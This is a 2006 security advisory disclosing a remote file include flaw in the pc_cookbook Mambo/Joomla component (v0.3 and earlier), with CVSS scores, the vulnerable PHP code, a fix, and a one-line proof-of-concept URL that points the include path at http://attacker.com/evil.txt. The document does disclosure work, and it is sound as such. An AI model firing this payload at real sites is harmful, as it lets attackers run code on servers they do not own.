pc_cookbook Mambo/Joomla Component <= v0.3 Remote File Include Vulnerabilities

Credit: matdhule
Risk: High
Local: No
Remote: Yes

CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

_ _____/_ ___ / | \_____ | __)_ / // ~ / | | \ ___ Y / | /_______ / ______ /___|_ /_______ / / / / / .OR.ID ECHO_ADV_37$2006 ------------------------------------------------------------------------ ----------------------- [ECHO_ADV_37$2006] pc_cookbook Mambo/Joomla Component <= v0.3 Remote File Include Vulnerabilities ------------------------------------------------------------------------ ----------------------- Author : Ahmad Maulana a.k.a Matdhule Date : July 10th 2006 Location : Indonesia, Jakarta Web : http://advisories.echo.or.id/adv/adv37-matdhule-2006.txt Critical Lvl : Highly critical Impact : System access Where : From Remote ------------------------------------------------------------------------ Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ pc_cookbook Component Application : pc_cookbook Component version : 0.3 URL : http://www.dianthos.net & http://www.fisheye.gr/koyansblog ------------------------------------------------------------------------ Vulnerability: ~~~~~~~~~~~~~~~ in folder com_pccookbook we found vulnerability script pccookbook.php. -----------------------pccookbook.php---------------------- .... <?php //pc_cookbook Component// /** * Content code * @package hello_world * Original @Copyright (C) 2005 Robert Prince * @Copyright (C) 2005 Konstantinos (koyan) Kokkorogiannis * @ All rights reserved * @ pc_cookbook is Free Software * @ Released under GNU/GPL License : http://www.gnu.org/copyleft/gpl.html * @version koyans 0.3 * @link http://www.dianthos.net & http://www.fisheye.gr/koyansblog **/ global $mosConfig_absolute_path; global $mosConfig_live_site; // include language file, or default to english if (file_exists ($mosConfig_absolute_path . '/components/com_pccookbook/languages/' . $mosConfig_lang . '.php')) { include_once ($mosConfig_absolute_path . '/components/com_pccookbook/languages/' . $mosConfig_lang . '.php'); } else { include_once ($mosConfig_absolute_path . '/components/com_pccookbook/languages/english.php'); } // end if ?> ... ---------------------------------------------------------- Variables $mosConfig_absolute_path are not properly sanitized. When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script. Proof Of Concept: ~~~~~~~~~~~~~~~~ http://[target]/[path]/components/com_pccookbook/pccookbook.php?mosConfi g_absolute_path=http://attacker.com/evil.txt? Solution: ~~~~~~~~ sanitize variabel $mosConfig_absolute_path in pccookbook.php ------------------------------------------------------------------------ --- Shoutz: ~~~~~~ ~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :) ~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous ~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama ~ newbie_hacker (at) yahoogroups (dot) com [email concealed], jasakom_perjuangan (at) yahoogroups (dot) com [email concealed] ~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net ------------------------------------------------------------------------ --- Contact: ~~~~~~~ matdhule[at]gmail[dot]com -------------------------------- [ EOF ]----------------------------------

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